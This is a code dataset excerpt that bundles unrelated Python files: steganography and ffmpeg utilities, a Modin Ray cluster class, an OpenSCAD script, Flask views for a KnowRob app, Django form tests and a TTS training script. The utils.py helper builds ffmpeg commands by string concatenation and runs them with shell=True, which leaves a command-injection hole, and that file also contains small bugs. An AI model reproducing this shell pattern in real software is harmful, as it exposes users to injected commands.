see_Cpixel\n\n# TODO debug\ndef pixel_histogram(diff_S, diff_C):\n \"\"\"Calculates histograms of errors for cover and secret image. \"\"\"\n diff_Sflat = diff_S.flatten()\n diff_Cflat = diff_C.flatten()\n\n fig = plt.figure(figsize=(15, 5))\n a = fig.add_subplot(1, 2, 1)\n\n imgplot = plt.hist(255 * diff_Cflat, 100, normed=1, alpha=0.75, facecolor='red')\n a.set_title('Distribution of error in the Cover image.')\n plt.axis([0, 250, 0, 0.2])\n\n a = fig.add_subplot(1, 2, 2)\n imgplot = plt.hist(255 * diff_Sflat, 100, normed=1, alpha=0.75, facSecolor='red')\n a.set_title('Distribution of errors in the Secret image.')\n plt.axis([0, 250, 0, 0.2])\n\n plt.show()\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\n\ndef show_image(img, n_rows, n_col, idx, gray=False, first_row=False, title=None):\n ax = plt.subplot(n_rows, n_col, idx)\n if gray:\n plt.imshow(rgb2gray(img), cmap = plt.get_cmap('gray'))\n else:\n plt.imshow(img)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n if first_row:\n plt.title(title)\n\n# Configs for results display\ndef result_display(input_S,input_C,decoded_S,decoded_C,\n SHOW_GRAY = False,SHOW_DIFF = True,ENHANCE = 1,n = 6):\n '''\n\n :param SHOW_GRAY: Show images in gray scale\n :param SHOW_DIFF: Show difference bettwen predictions and ground truth.\n :param ENHANCE: Diff enhance magnitude\n :param n: Number of secret and cover pairs to show.\n :return:\n '''\n # Get absolute difference between the outputs and the expected values.\n diff_S, diff_C = np.abs(decoded_S - input_S), np.abs(decoded_C - input_C)\n\n # Print pixel-wise average errors in a 256 scale.\n S_error, C_error = pixel_errors(input_S, input_C, decoded_S, decoded_C)\n\n print(\"S error per pixel [0, 255]:\", S_error)\n print(\"C error per pixel [0, 255]:\", C_error)\n # pixel_histogram(diff_S, diff_C)\n if n > 6:\n n = 6\n\n plt.figure(figsize=(14, 15))\n rand_indx = [random.randint(0, len(input_C)) for x in range(n)]\n # for i, idx in enumerate(range(0, n)):\n for i, idx in enumerate(rand_indx):\n n_col = 6 if SHOW_DIFF else 4\n\n show_image(input_C[i], n, n_col, i * n_col + 1, gray=SHOW_GRAY, first_row=i == 0, title='Cover')\n\n show_image(input_S[i], n, n_col, i * n_col + 2, gray=SHOW_GRAY, first_row=i == 0, title='Secret')\n\n show_image(decoded_C[i], n, n_col, i * n_col + 3, gray=SHOW_GRAY, first_row=i == 0, title='Encoded Cover')\n\n show_image(decoded_S[i], n, n_col, i * n_col + 4, gray=SHOW_GRAY, first_row=i == 0, title='Decoded Secret')\n\n if SHOW_DIFF:\n show_image(np.multiply(diff_C[i], ENHANCE), n, n_col, i * n_col + 5, gray=SHOW_GRAY, first_row=i == 0,\n title='Diff Cover')\n\n show_image(np.multiply(diff_S[i], ENHANCE), n, n_col, i * n_col + 6, gray=SHOW_GRAY, first_row=i == 0,\n title='Diff Secret')\n\n plt.show()\n\ndef MatrixToImage(data):\n data = data*255\n new_im = Image.fromarray(data.astype(np.uint8))\n return new_im\n\n# new display and write\ndef iamge_save(decoded_S,decoded_C,orig_size,path='./outcome',name_box = None):\n cover_path = path+'/cover/'\n secret_path = path + '/secret/'\n if not os.path.exists(path):\n os.mkdir(path)\n if not os.path.exists(cover_path):\n os.mkdir(cover_path)\n if not os.path.exists(secret_path):\n os.mkdir(secret_path)\n for i in range(decoded_C.shape[0]):\n d_C = MatrixToImage(decoded_C[i])\n d_S = MatrixToImage(decoded_S[i])\n if d_C.size != orig_size[i]:\n d_C = d_C.resize(orig_size[i], Image.ANTIALIAS)\n d_S = d_S.resize(orig_size[i], Image.ANTIALIAS)\n if name_box==None:\n d_C.save(cover_path+f'{i}.png')\n d_S.save(secret_path+f'{i}.png')\n else:\n d_C.save(cover_path + str(name_box[i])+r'.png')\n d_S.save(secret_path + str(name_box[i])+r'.png')\n print('\\nFinsh! ')\n\n\n\ndef load_dataset_small(num_images_per_class_train, num_images_test, train_set_range):\n \"\"\"Loads training and test datasets, from Tiny ImageNet Visual Recogition Challenge.\n\n Arguments:\n num_images_per_class_train: number of images per class to load into training dataset.\n num_images_test: total number of images to load into training dataset.\n \"\"\"\n X_train = []\n X_test = []\n X_test_size = []\n\n\n # Get training dataset directory. It should contain 'train' folder and 'test' folder.\n path = easygui.diropenbox(title = 'Choose dataset directory')\n # path = './exp'\n # Create training set.\n train_set = os.listdir(os.path.join(path, 'train'))\n for c in train_set:\n train_set_range = train_set_range - 1\n if train_set_range < 0:\n break\n c_dir = os.path.join(path, 'train', c, 'images')\n c_imgs = os.listdir(c_dir)\n random.shuffle(c_imgs)\n for img_name_i in c_imgs[0:num_images_per_class_train]:\n img_i = image.load_img(os.path.join(c_dir, img_name_i))\n x = image.img_to_array(img_i)\n X_train.append(x)\n random.shuffle(X_train)\n\n # Create test set.\n test_dir = os.path.join(path, 'test','images')\n test_imgs = os.listdir(test_dir)\n random.shuffle(test_imgs)\n for img_name_i in test_imgs[0:num_images_test]:\n img_i = image.load_img(os.path.join(test_dir, img_name_i))\n #resize\n img_i_reshape,img_ori_size = resize_image(img_i)\n x = image.img_to_array(img_i_reshape)\n X_test.append(x)\n X_test_size.append(img_ori_size)\n\n\n # Return train and test data as numpy arrays.\n return np.array(X_train), np.array(X_test), X_test_size\n\ndef resize_image(im):\n '''\n N*M is resized to N*N\n :param im: image cls\n :return: if idx==0 N==M\n '''\n (x,y) = im.size\n if x==y:\n return im, (x,y)\n elif x>y:\n N = y\n M = x\n idx_bigger = 1\n else:\n N = x\n M = y\n idx_bigger = 2\n out = im.resize((N,N), Image.ANTIALIAS)\n\n return out, (x,y)\n\n\n\ndef ffmpegProcess(code):\n '''\n run ffmepg code\n '''\n getmp3 = code\n returnget = subprocess.call(getmp3,shell=True)\n # print(returnget)\n\ndef extractFrameOfVideo(video_path,frame_rate=30,frame_save_path='./coverSource'):\n DivideCode = 'ffmpeg -i ' + video_path + ' -r '+str(frame_rate)+' '+frame_save_path+'%06d.png'\n ffmpegProcess(DivideCode)\n return\n\ndef generateVideo(frame_save_path='./hideSource',output_path='./test.mp4',frame_rate=5):\n generateCode = \"ffmpeg -framerate \"+str(frame_rate)+\" -i \"+frame_save_path+\"\\%d.png -vcodec libx264 -r \"\\\n +str(frame_rate)+\" -pix_fmt yuv420p \"+output_path\n ffmpegProcess(generateCode)\n\ndef readFrames(file_path):\n '''\n :return: list of framePath and num of file\n '''\n fs = os.listdir(file_path)\n fs.sort(key=lambda x: int(x[:-4]))\n file_name_list = []\n cnt=0\n for f in fs:\n file_name_list.append(os.path.join(file_path,f))\n cnt += 1\n return file_name_list,cnt\n\ndef randomSort(file_name_list,length,key,mode='encode'):\n '''\n if you want to recover the length and key must keep same\n :param file_name_list:\n :param length: number of files\n :param key: as seed\n :return: resorted list\n '''\n\n random.seed(key)\n # generate the random order\n rs = random.sample(range(length),length)\n resorted_list = []\n if mode=='encode':\n for i in range(length):\n resorted_list.append(file_name_list[rs[i]])\n print(resorted_list)\n elif mode =='decode':\n tmp = list(range(length))\n for i in range(length):\n tmp[rs[i]] = file_name_list[i]\n resorted_list = tmp\n print(resorted_list)\n else:\n print('mode wrong\\n')\n\n return resorted_list\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"509819191","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\nimport threading\nimport os\nimport traceback\nimport sys\nfrom hashlib import sha1\nfrom typing import Callable\n\nimport yaml\nfrom ray.autoscaler.commands import (\n create_or_update_cluster,\n teardown_cluster,\n get_head_node_ip,\n _bootstrap_config,\n)\n\nfrom .base import (\n CannotSpawnCluster,\n CannotDestroyCluster,\n ConnectionDetails,\n _get_ssh_proxy_command,\n)\nfrom .cluster import BaseCluster, Provider\n\n\nclass _ThreadTask:\n def __init__(self, target: Callable):\n self.target = target\n self.thread: threading.Thread = None\n self.exc: Exception = None\n self.silent = False\n\n\nclass _Immediate:\n def __init__(self, target: Callable):\n self.target = target\n\n def start(self):\n self.target()\n\n def join(self):\n pass\n\n\nclass RayCluster(BaseCluster):\n target_engine = \"Cloudray\"\n target_partition = \"Pandas\"\n\n __base_config = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"ray-autoscaler.yml\"\n )\n __instance_key = {Provider.AWS: \"InstanceType\"}\n __image_key = {Provider.AWS: \"ImageId\"}\n __credentials_env = {Provider.AWS: \"AWS_SHARED_CREDENTIALS_FILE\"}\n\n def __init__(self, *a, **kw):\n self.spawner = _ThreadTask(self.__do_spawn)\n self.destroyer = _ThreadTask(self.__do_destroy)\n\n self.ready = False\n super().__init__(*a, **kw)\n\n if self.provider.credentials_file is not None:\n try:\n config_key = self.__credentials_env[self.provider.name]\n except KeyError:\n raise ValueError(f\"Unsupported provider: {self.provider.name}\")\n os.environ[config_key] = self.provider.credentials_file\n\n self.config = self.__make_config()\n self.config_file = self.__save_config(self.config)\n\n def _spawn(self, wait=True):\n self.__run_thread(wait, self.spawner)\n\n def _destroy(self, wait=True):\n self.__run_thread(wait, self.destroyer)\n\n def __run_thread(self, wait, task: _ThreadTask):\n if not task.thread:\n task.thread = (_Immediate if wait else threading.Thread)(target=task.target)\n task.thread.start()\n\n if wait:\n task.silent = True\n task.thread.join()\n exc, task.exc = task.exc, None\n if exc:\n raise exc\n\n def __make_config(self):\n with open(self.__base_config) as inp:\n config = yaml.safe_load(inp.read())\n\n # cluster and provider details\n config[\"cluster_name\"] = self.cluster_name\n config[\"min_workers\"] = self.worker_count\n config[\"max_workers\"] = self.worker_count\n config[\"initial_workers\"] = self.worker_count\n config[\"provider\"][\"type\"] = self.provider.name\n if self.provider.region:\n config[\"provider\"][\"region\"] = self.provider.region\n if self.provider.zone:\n config[\"provider\"][\"availability_zone\"] = self.provider.zone\n\n # connection details\n config[\"auth\"][\"ssh_user\"] = \"ubuntu\"\n socks_proxy_cmd = _get_ssh_proxy_command()\n if socks_proxy_cmd:\n config[\"auth\"][\"ssh_proxy_command\"] = socks_proxy_cmd\n\n # instance types\n try:\n instance_key = self.__instance_key[self.provider.name]\n image_key = self.__image_key[self.provider.name]\n except KeyError:\n raise ValueError(f\"Unsupported provider: {self.provider.name}\")\n\n config[\"head_node\"][instance_key] = self.head_node_type\n config[\"head_node\"][image_key] = self.provider.image\n config[\"worker_nodes\"][instance_key] = self.worker_node_type\n config[\"worker_nodes\"][image_key] = self.provider.image\n\n return _bootstrap_config(config)\n\n @staticmethod\n def __save_config(config):\n cfgdir = os.path.abspath(os.path.expanduser(\"~/.modin/cloud\"))\n os.makedirs(cfgdir, mode=0o700, exist_ok=True)\n namehash = sha1(repr(config).encode(\"utf8\")).hexdigest()[:8]\n entry = os.path.join(cfgdir, f\"config-{namehash}.yml\")\n\n with open(entry, \"w\") as out:\n out.write(yaml.dump(config))\n return entry\n\n def __do_spawn(self):\n try:\n create_or_update_cluster(\n self.config_file,\n override_min_workers=None,\n override_max_workers=None,\n no_restart=False,\n restart_only=False,\n yes=True,\n override_cluster_name=None,\n )\n # need to re-load the config, as create_or_update_cluster() modifies it\n with open(self.config_file) as inp:\n self.config = yaml.safe_load(inp.read())\n self.ready = True\n except BaseException as ex:\n self.spawner.exc = CannotSpawnCluster(\n \"Cannot spawn cluster\", cause=ex, traceback=traceback.format_exc()\n )\n if not self.spawner.silent:\n sys.stderr.write(f\"Cannot spawn cluster:\\n{traceback.format_exc()}\\n\")\n\n def __do_destroy(self):\n try:\n teardown_cluster(\n self.config_file,\n yes=True,\n workers_only=False,\n override_cluster_name=None,\n keep_min_workers=0,\n )\n self.ready = False\n self.config = None\n except BaseException as ex:\n self.destroyer.exc = CannotDestroyCluster(\n \"Cannot destroy cluster\", cause=ex, traceback=traceback.format_exc()\n )\n if not self.destroyer.silent:\n sys.stderr.write(f\"Cannot destroy cluster:\\n{traceback.format_exc()}\\n\")\n\n def _get_connection_details(self) -> ConnectionDetails:\n \"\"\"\n Gets the coordinates on how to connect to cluster frontend node.\n \"\"\"\n assert self.ready, \"Cluster is not ready, cannot get connection details\"\n return ConnectionDetails(\n user_name=self.config[\"auth\"][\"ssh_user\"],\n key_file=self.config[\"auth\"][\"ssh_private_key\"],\n address=get_head_node_ip(self.config_file, override_cluster_name=None),\n )\n\n def _get_main_python(self) -> str:\n \"\"\"\n Gets the path to 'main' interpreter (the one that houses created environment for running everything)\n \"\"\"\n return \"~/miniconda/envs/modin/bin/python\"\n","sub_path":"modin/experimental/cloud/rayscale.py","file_name":"rayscale.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"556271622","text":"\"\"\" openscad-board-maker.py\n\nUsage:\n openscad-board-maker.py \n\n\"\"\"\n\nfrom solid import *\n\nimport docopt\n\nif __name__ == \"__main__\":\n args = docopt.docopt(__doc__)\n\n l = float(args[\"\"])\n w = float(args[\"\"])\n\n r = 4\n\n rect1 = cube(size=(l, w - 2*r, 1.6), center=True)\n rect2 = cube(size=(l - 2*r, w, 1.6), center=True)\n\n corner_centers = (l/2-r, w/2-r)\n\n corners = [\n translate(v=(corner_centers[0], corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n ),\n translate(v=(-corner_centers[0], corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n ),\n translate(v=(corner_centers[0], -corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n ),\n translate(v=(-corner_centers[0], -corner_centers[1], 0)) (\n cylinder(r=r, h=1.6, center=True) - hole()(cylinder(r=1.5, h=1.7, center=True))\n )\n ]\n\n a = union()(rect1, rect2, *corners)\n\n scad_render_to_file(a, file_header='$fn = 48;', include_orig_code=True)","sub_path":"openscad-board-maker.py","file_name":"openscad-board-maker.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"318554377","text":"\nfrom flask import session, jsonify, request, redirect, render_template, url_for, Markup, send_from_directory\nfrom flask_user import login_required\nfrom flask.ext.misaka import markdown\n\nimport os, re\nimport json\n\nfrom urlparse import urlparse\n\nfrom webrob.app_and_db import app, db\nfrom webrob.user.knowrob_user import read_tutorial_page\nfrom webrob.docker.docker_application import ensure_application_started\nfrom webrob.docker import docker_interface\n\nfrom utility import *\n\nMAX_HISTORY_LINES = 50\n\n@app.route('/knowrob/static/')\n@login_required\ndef download_static(filename):\n return send_from_directory(os.path.join(app.root_path, \"static\"), filename)\n\n@app.route('/knowrob/knowrob_data/')\n@login_required\ndef download_logged_image(filename):\n return send_from_directory('/home/ros/knowrob_data/', filename)\n\n@app.route('/knowrob/summary_data/')\n@login_required\ndef download_summary_image(filename):\n # TODO migrate summary_data -> users own data container and use docker_interface to retrieve summary!\n return send_from_directory('/home/ros/summary_data/', filename)\n\n@app.route('/knowrob/tutorials/')\n@app.route('/knowrob/tutorials//')\n@app.route('/knowrob/tutorials//')\n# @login_required\ndef tutorials(cat_id='getting_started', page=1):\n session['video'] = 0\n if not ensure_application_started('knowrob/hydro-knowrob-daemon'):\n return redirect(url_for('/knowrob/tutorials/'))\n \n error=\"\"\n # determine hostname/IP we are currently using\n # (needed for accessing container)\n host_url = urlparse(request.host_url).hostname\n container_name = session['user_container_name'] # 'tutorials'\n show_south_pane = False\n readonly = True\n authentication = False\n\n tut = read_tutorial_page(cat_id, page)\n content = markdown(tut.text, fenced_code=True)\n\n # automatically add event handler for highlighting DOM elements\n tmp = re.findall('(.*?)', str(content))\n for t in tmp:\n if 'hl_' in t:\n text = t.split(' hl_')[0]\n idname = t.split(' hl_')[1]\n content = re.sub('{} hl_{}'.format(text, idname), '{1}'.format(idname, text), str(content))\n elif 'hlc_' in t:\n text = t.split(' hlc_')[0]\n classname = t.split(' hlc_')[1]\n content = re.sub('{} hlc_{}'.format(text, classname), '{1}'.format(classname, text), str(content))\n\n # automatically add \"ask as query\" links after code blocks\n content = re.sub('(\\s)?', \"

\", str(content))\n content = Markup(content)\n\n # check whether there is another tutorial in this category\n nxt = read_tutorial_page(cat_id, int(page)+1)\n prev = read_tutorial_page(cat_id, int(page)-1)\n\n return render_template('knowrob_tutorial.html', **locals())\n\n@app.route('/knowrob/')\n@app.route('/knowrob/hydro-knowrob-daemon')\n@app.route('/knowrob/exp/')\n@login_required\ndef knowrob(exp_path=None):\n session['video'] = 0\n if not ensure_application_started('knowrob/hydro-knowrob-daemon'):\n return redirect(url_for('user.logout'))\n \n error=\"\"\n # determine hostname/IP we are currently using\n # (needed for accessing container)\n host_url = urlparse(request.host_url).hostname\n\n container_name = session['user_container_name']\n show_south_pane = True\n # Remember experiment selection\n if exp_path is not None: session['exp'] = exp_path\n # Select a query file\n exp_query_file = None\n if 'exp' in session:\n exp = session['exp']\n if exp is not None: exp_query_file = exp + '.json'\n # TODO: Allow to select html template using a experiment configuration file\n\n return render_template('knowrob_simple.html', **locals())\n\n@app.route('/knowrob/video')\n@app.route('/knowrob/video/exp/')\n@login_required\ndef video(exp_path=None):\n session['video'] = 1\n if not ensure_application_started('knowrob/hydro-knowrob-daemon'):\n return redirect(url_for('user.logout'))\n \n error=\"\"\n # determine hostname/IP we are currently using\n # (needed for accessing container)\n host_url = urlparse(request.host_url).hostname\n container_name = session['user_container_name']\n\n # Remember experiment selection\n if exp_path is not None: session['exp'] = exp_path\n # Select a query file\n exp_query_file = None\n if 'exp' in session:\n exp = session['exp']\n if exp is not None: exp_query_file = exp + '.json'\n \n return render_template('video.html', **locals())\n\n@app.route('/knowrob/menu', methods=['POST'])\n@app.route('/knowrob/hydro-knowrob-daemon/menu', methods=['POST'])\ndef menu():\n knowrobUrl = '/knowrob/'\n \n menu_left = [\n ('Knowledge Base', knowrobUrl),\n ('Robot Memory Replay', knowrobUrl+'video'),\n ('Editor', knowrobUrl+'editor')\n ]\n \n exp_selection = __exp_file__()\n if exp_selection is None: exp_selection = \"Experiment\"\n \n exp_choices_map = {}\n for (submenu,exp) in __exp_list__():\n # Find exp url\n exp_url = knowrobUrl\n if __is_video__():\n exp_url += 'video/'\n exp_url += 'exp/'\n if len(submenu)>0:\n exp_url += submenu + '/'\n exp_url += exp\n \n menu = ''\n if len(submenu)>0:\n menu = submenu\n if not menu in exp_choices_map:\n exp_choices_map[menu] = []\n \n exp_choices_map[menu].append((exp, exp_url))\n \n exp_choices = []\n exp_map_keys = exp_choices_map.keys()\n exp_map_keys.sort()\n \n for key in exp_map_keys:\n if key == '': continue\n exp_choices_map[key].sort()\n exp_choices.append(('CHOICES', (key+' >>', exp_choices_map[key])))\n if '' in exp_map_keys:\n exp_choices_map[''].sort()\n exp_choices += exp_choices_map['']\n \n menu_right = [\n ('CHOICES', (exp_selection, exp_choices))\n ]\n \n return jsonify(menu_left=menu_left, menu_right=menu_right)\n\ndef __exp_menu_file__(f, category):\n if f.endswith(\".json\"):\n return (category, f[0:len(f)-len(\".json\")])\n else:\n return None\n \ndef __exp_list__():\n expList = []\n exp_root_path = os.path.join(app.root_path, \"static/experiments/queries\")\n \n for f0 in os.listdir(exp_root_path):\n exp_path = os.path.join(exp_root_path, f0)\n \n # Query file with submenu\n if os.path.isdir(exp_path):\n for f1 in os.listdir(exp_path):\n menu_entry = __exp_menu_file__(f1, f0)\n if menu_entry != None: expList.append(menu_entry)\n \n # Query file without submenu\n else:\n menu_entry = __exp_menu_file__(f0, '')\n if menu_entry != None: expList.append(menu_entry)\n \n return expList\n\ndef __exp_file__():\n if 'exp' in session:\n return session['exp']\n else:\n return None\n\ndef __is_video__():\n if 'video' in session:\n return session['video']\n else:\n return 0\n \n@app.route('/knowrob/exp_set', methods=['POST'])\n@login_required\ndef exp_set():\n expName = json.loads(request.data)['experimentName']\n session['exp'] = expName\n return jsonify(result=None)\n\n@app.route('/knowrob/add_history_item', methods=['POST'])\n@login_required\ndef add_history_item():\n query = json.loads(request.data)['query']\n hfile = get_history_file()\n # Remove newline characters\n query.replace(\"\\n\", \" \")\n \n # Read history\n lines = []\n if os.path.isfile(hfile):\n f = open(hfile)\n lines = f.readlines()\n f.close()\n # Append the last query\n lines.append(query+\".\\n\")\n # Remove old history items\n numLines = len(lines)\n lines = lines[max(0, numLines-MAX_HISTORY_LINES):numLines]\n \n with open(hfile, \"w\") as f:\n f.writelines(lines)\n \n return jsonify(result=None)\n\n@app.route('/knowrob/get_history_item', methods=['POST'])\n@login_required\ndef get_history_item():\n index = json.loads(request.data)['index']\n \n if index<0:\n return jsonify(item=\"\", index=-1)\n \n hfile = get_history_file()\n if os.path.isfile(hfile):\n # Read file content\n f = open(hfile)\n lines = f.readlines()\n f.close()\n \n # Clamp index\n if index<0: index=0\n if index>=len(lines): index=len(lines)-1\n if index<0: return jsonify(item=\"\", index=-1)\n \n item = lines[len(lines)-index-1]\n item = item[:len(item)-1]\n \n return jsonify(item=item, index=index)\n \n else:\n return jsonify(item=\"\", index=-1)\n\n\ndef get_history_file():\n userDir = get_user_dir()\n return os.path.join(get_user_dir(), \"query.history\")\n","sub_path":"webapps/knowrob/webrob/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"90323663","text":"\"\"\"Main script. Run your experiments from here\"\"\"\nfrom src.dataset import TextToSpeechDataset\nfrom src.Tacotron_model.taco_util import fetch_model,fetch_optimizer,fetch_dataloader\nfrom torch.utils.data.dataset import Subset\nimport src.hparam as hp\nimport torch\nimport src.Tacotron_model.util as utils\nfrom src.Tacotron_model.util import text_to_sequence, wav_to_spectrogram\nfrom src.Tacotron_model.taco_train import train_and_evaluate\n\nimport torch\nimport argparse\nimport os\n\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\nlog = logging.getLogger()\n\n\ndef parse_args():\n \"\"\"Parse command line arguments.\n Returns:\n\t\t(Namespace): arguments\n\t\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-l', '--logdir', type=str,\n\t\t\t\t\t\tdefault='log/tacotron',\n\t\t\t\t\t\thelp='parent directory of experiment logs (checkpoints/tensorboard events)')\n parser.add_argument('--log_level', type=str, default='WARNING',\n\t\t\t\t\t\thelp='log level to be used')\n parser.add_argument('-n', '--name', type=str, default='Training-naive',\n\t\t\t\t\t\thelp='name of experiment')\n parser.add_argument('-c', '--checkpoint', type=str, default=None,\n\t\t\t\t\t\trequired=False, help='path to checkpoint')\n parser.add_argument('--default_hparams', type=str,\n\t\t\t\t\t\tdefault='Tacotron_model/taco_hparams.yaml', help='path to .yaml with default hparams')\n parser.add_argument('--hparams', type=str,\n\t\t\t\t\t\trequired=False, help='comma separated name=value pairs')\n parser.add_argument('--data', type=str, default='/home/rajanie/Documents/Semester2/TTS/LJSpeech-1.1/',\n\t\t\t\t\t\thelp='csv file of texts and audio names in LLJDS Format')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n # set log level\n assert (args.log_level in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'])\n log.setLevel(logging.getLevelName(args.log_level))\n # make sure log directory exists\n logdir = os.path.join(args.logdir, args.name)\n if not os.path.isdir(logdir):\n log.info(\"Creating directory {}\".format(logdir))\n os.makedirs(logdir)\n os.chmod(logdir, 0o775)\n hparams = hp.load_params_from_yaml(args.default_hparams)\n hparams.parse(args.hparams)\n hp.write_params_to_yaml(hparams, os.path.join(logdir, 'hparams.yaml'))\n #print(hparams)\n\n\n # set seed for reproducible experiments\n torch.manual_seed(hparams.seed)\n if torch.cuda.is_available():\n log.info(\"CUDA is available. Using GPU.\")\n torch.cuda.manual_seed(hparams.seed)\n torch.backends.cudnn.benchmark = True\n hparams.device = torch.device(\"cuda:0\")\n hparams.cuda = True\n else:\n log.info(\"CUDA is not available. Using CPU.\")\n hparams.device = torch.device(\"cpu\")\n hparams.cuda = False\n\n\n \n\n PATH = args.data\n dataset = TextToSpeechDataset(path = PATH,\n text_embeddings=text_to_sequence,\n mel_transforms=wav_to_spectrogram)\n logdir = args.logdir\n checkpoint = args.checkpoint\n fetch_dataloader(dataset,hparams)\n\n\n #train_and_evaluate(dataset, hparams, logdir)\n\n #melnet.cuda(device:0)\n # melnet #=melnet.load_state_dict(torch.load('/home/rajaniep/code/UntitledFolder/runs/melnet.pt'))\n\n\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"618777962","text":"from django.test import TestCase\n\nimport mock\nfrom model_mommy import mommy\n\nfrom battles.forms import CreateBattleForm, CreateTeamForm\nfrom pokemon.helpers import save_pokemon\nfrom pokemon.models import Pokemon\n\n\nclass TestCreateTeamForm(TestCase):\n def setUp(self):\n self.trainer = mommy.make(\"users.User\")\n self.pokemon_1 = mommy.make(\"pokemon.Pokemon\", attack=50, defense=50, hp=50)\n self.pokemon_2 = mommy.make(\"pokemon.Pokemon\", attack=50, defense=50, hp=50)\n self.pokemon_3 = mommy.make(\"pokemon.Pokemon\", attack=50, defense=50, hp=50)\n self.battle = mommy.make(\"battles.Battle\")\n\n def test_create_a_team(self):\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": self.pokemon_2.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"1\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertTrue(form.is_valid())\n\n def test_team_cant_have_identical_pokemon(self):\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": self.pokemon_1.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"1\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertFalse(form.is_valid())\n self.assertEqual(\n [\"Your team has duplicates, please use unique pokemon\"], form.non_field_errors()\n )\n\n @mock.patch(\"pokemon.helpers.get_pokemon_stats\")\n def test_pokemon_exceeds_points_limit(self, mock_get_pokemon_stats):\n mock_get_pokemon_stats.return_value = {\n \"name\": \"mock_name\",\n \"id\": 493,\n \"sprite\": \"\",\n \"attack\": 360,\n \"defense\": 360,\n \"hp\": 360,\n }\n\n save_pokemon(493)\n pokemon_493 = Pokemon.objects.get(id=493)\n\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": pokemon_493.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"1\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertFalse(form.is_valid())\n self.assertEqual(\n [\"Your team exceeds the 600 points limit, please choose another team\"],\n form.non_field_errors(),\n )\n assert mock_get_pokemon_stats.called\n\n def test_more_than_one_pokemon_cant_battle_in_the_same_round(self):\n params = {\n \"data\": {\n \"trainer\": self.trainer.id,\n \"pokemon_1\": self.pokemon_1.id,\n \"pokemon_2\": self.pokemon_2.id,\n \"pokemon_3\": self.pokemon_3.id,\n \"order_1\": \"2\",\n \"order_2\": \"2\",\n \"order_3\": \"3\",\n },\n }\n form = CreateTeamForm(**params)\n self.assertFalse(form.is_valid())\n self.assertEqual([\"Please allocate one pokemon per round\"], form.non_field_errors())\n\n\nclass TestCreateBattleForm(TestCase):\n def setUp(self):\n self.creator = mommy.make(\"users.User\")\n self.opponent = mommy.make(\"users.User\")\n\n def test_form_is_valid(self):\n params = {\n \"initial\": {\"user_creator\": self.creator},\n \"data\": {\"user_creator\": self.creator.id, \"user_opponent\": self.opponent.id},\n }\n form = CreateBattleForm(**params)\n self.assertTrue(form.is_valid())\n","sub_path":"backend/battles/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"441287515","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 4 13:34:22 2018\n\n@author: evanderdcosta\n\"\"\"\n\nimport inspect\nimport os\nimport tensorflow as tf\n\ndef class_vars(obj):\n return{k:v for k,v in inspect.getmembers(obj) \n if not k.startswith('__') and not callable(k)}\n \n\nclass BaseModel(object):\n def __init__(self, config, sess):\n self.config = config\n self.sess = sess\n self._saver = None\n \n # Keep a graph variable tracking steps\n # Can use this for annealing, etc\n with tf.variable_scope('step'):\n self.step = tf.Variable(0, trainable=False, name='step')\n self.step_input = tf.placeholder('int32', None, name='step_input')\n self.step_assign_op = self.step.assign(self.step_input)\n \n \n try:\n self._attrs = config.__dict__['__flags']\n except:\n self._attrs = class_vars(config)\n print(self._attrs)\n \n for attr in self._attrs:\n name = attr if not attr.startswith('_') else 